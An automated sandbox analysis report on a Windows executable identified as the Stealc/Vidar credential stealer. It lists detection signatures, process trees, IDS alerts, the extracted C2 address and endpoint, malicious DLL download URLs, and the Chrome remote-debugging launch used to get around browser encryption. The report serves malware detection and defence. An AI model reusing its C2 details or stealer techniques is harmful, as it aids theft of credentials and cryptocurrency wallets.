
Windows Analysis Report
0vsAIy0DhJ.exe

Overview

General Information

Sample name: 0vsAIy0DhJ.exe (renamed because the original name is a hash value)
Original sample name: 0450c46fed73f12abf70136a969e1d7e3d99df399b6639ac0db42249c268047c.exe
Analysis ID: 1620676
MD5: 373c8e521ae5529ec40bcc97e81ebf02
SHA1: e7ca825a8d986cfa1dd49c75a7a98b5f35bf42dc
SHA256: 0450c46fed73f12abf70136a969e1d7e3d99df399b6639ac0db42249c268047c
Tags: exe, Stealc, user-zhuzhu0009

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 0vsAIy0DhJ.exe (PID: 2004 cmdline: "C:\Users\user\Desktop\0vsAIy0DhJ.exe" MD5: 373C8E521AE5529EC40BCC97E81EBF02)
    • chrome.exe (PID: 5808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7176 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2160,i,1634129405105479003,15236246413488024638,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that grabs information on 2FA software and the Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "185.215.113.115/c4becf79229cb002.php", "Botnet": "reno"}
Source: dump.pcap; Rule: JoeSecurity_Stealc_1; Description: Yara detected Stealc; Author: Joe Security
Source: 00000000.00000002.2003720246.0000000000511000.00000040.00000001.01000000.00000003.sdmp; Rule: JoeSecurity_Stealc; Description: Yara detected Stealc; Author: Joe Security
Source: 00000000.00000003.1678322710.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_Stealc; Description: Yara detected Stealc; Author: Joe Security
Source: 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_Stealc; Description: Yara detected Stealc; Author: Joe Security
Source: Process Memory Space: 0vsAIy0DhJ.exe PID: 2004; Rule: JoeSecurity_Vidar_1; Description: Yara detected Vidar stealer; Author: Joe Security
Source: Process Memory Space: 0vsAIy0DhJ.exe PID: 2004; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security

System Summary

Source: Process started; Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\0vsAIy0DhJ.exe", ParentImage: C:\Users\user\Desktop\0vsAIy0DhJ.exe, ParentProcessId: 2004, ParentProcessName: 0vsAIy0DhJ.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 5808, ProcessName: chrome.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-21T07:18:10.174846+0100 | 2044245 | 1 | Malware Command and Control Activity Detected | 185.215.113.115 | 80 | 192.168.2.4 | 49731 | TCP
2025-02-21T07:18:10.167942+0100 | 2044244 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 185.215.113.115 | 80 | TCP
2025-02-21T07:18:10.390509+0100 | 2044246 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 185.215.113.115 | 80 | TCP
2025-02-21T07:18:11.630453+0100 | 2044248 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 185.215.113.115 | 80 | TCP
2025-02-21T07:18:10.397990+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 185.215.113.115 | 80 | 192.168.2.4 | 49731 | TCP
2025-02-21T07:18:09.946069+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 185.215.113.115 | 80 | TCP
2025-02-21T07:18:12.064865+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 185.215.113.115 | 80 | TCP
2025-02-21T07:18:24.972029+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49753 | 185.215.113.115 | 80 | TCP
2025-02-21T07:18:26.545101+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49753 | 185.215.113.115 | 80 | TCP
2025-02-21T07:18:27.222144+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49753 | 185.215.113.115 | 80 | TCP
2025-02-21T07:18:28.066947+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49753 | 185.215.113.115 | 80 | TCP
2025-02-21T07:18:31.938029+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49753 | 185.215.113.115 | 80 | TCP
2025-02-21T07:18:32.658628+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49753 | 185.215.113.115 | 80 | TCP


AV Detection

Source: 0vsAIy0DhJ.exe; Avira: detected
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlld; Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/msvcp140.dlla; Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/sqlite3.dlle; Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phprowser; Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpB; Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpxA; Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpD; Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phprofiles; Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpser; Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/softokn3.dllp; Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll$; Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll4; Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpl:z0; Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php3#z7; Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php8; Avira URL Cloud: Label: malware
Source: 0vsAIy0DhJ.exe.2004.0.memstrmin; Malware Configuration Extractor: StealC {"C2 url": "185.215.113.115/c4becf79229cb002.php", "Botnet": "reno"}
Source: 0vsAIy0DhJ.exe; ReversingLabs: Detection: 65%
Source: 0vsAIy0DhJ.exe; Virustotal: Detection: 63%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C5EA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,0_2_6C5EA9A0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C5E4440 PK11_PrivDecrypt,0_2_6C5E4440
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C5B4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,0_2_6C5B4420
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C5E44C0 PK11_PubEncrypt,0_2_6C5E44C0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C6325B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,0_2_6C6325B0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C5EA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,0_2_6C5EA650
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C5C8670 PK11_ExportEncryptedPrivKeyInfo,0_2_6C5C8670
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C5CE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,0_2_6C5CE6E0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C60A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,0_2_6C60A730
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C610180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,0_2_6C610180
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C5E43B0 PK11_PubEncryptPKCS1,PR_SetError,0_2_6C5E43B0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C607C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,0_2_6C607C00
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C5C7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,0_2_6C5C7D60
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C60BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,0_2_6C60BD30
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C609EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,0_2_6C609EC0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C5E3FF0 PK11_PrivDecryptPKCS1,0_2_6C5E3FF0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C5E3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,0_2_6C5E3850
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; Code function: 0_2_6C5E9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,0_2_6C5E9840
Source: 0vsAIy0DhJ.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: 0vsAIy0DhJ.exe, 00000000.00000002.2015932243.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: 0vsAIy0DhJ.exe, 00000000.00000002.2015932243.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: chrome.exe; Memory has grown: Private usage: 1MB later: 40MB

Networking

Source: Network traffic; Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49731 -> 185.215.113.115:80
Source: Network traffic; Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49731 -> 185.215.113.115:80
Source: Network traffic; Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.115:80 -> 192.168.2.4:49731
Source: Network traffic; Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49731 -> 185.215.113.115:80
Source: Network traffic; Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.115:80 -> 192.168.2.4:49731
Source: Network traffic; Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49731 -> 185.215.113.115:80
Source: Malware configuration extractor; URLs: 185.215.113.115/c4becf79229cb002.php
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Date: Fri, 21 Feb 2025 06:18:11 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT; ETag: "10e436-5e7ec6832a180"; Accept-Ranges: bytes; Content-Length: 1106998; Content-Type: application/x-msdos-program
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Date: Fri, 21 Feb 2025 06:18:24 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT; ETag: "a7550-5e7e950876500"; Accept-Ranges: bytes; Content-Length: 685392; Content-Type: application/x-msdos-program
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Date: Fri, 21 Feb 2025 06:18:26 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT; ETag: "94750-5e7e950876500"; Accept-Ranges: bytes; Content-Length: 608080; Content-Type: application/x-msdos-program
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Date: Fri, 21 Feb 2025 06:18:27 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT; ETag: "6dde8-5e7e950876500"; Accept-Ranges: bytes; Content-Length: 450024; Content-Type: application/x-msdos-program
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 21 Feb 2025 06:18:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 21 Feb 2025 06:18:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 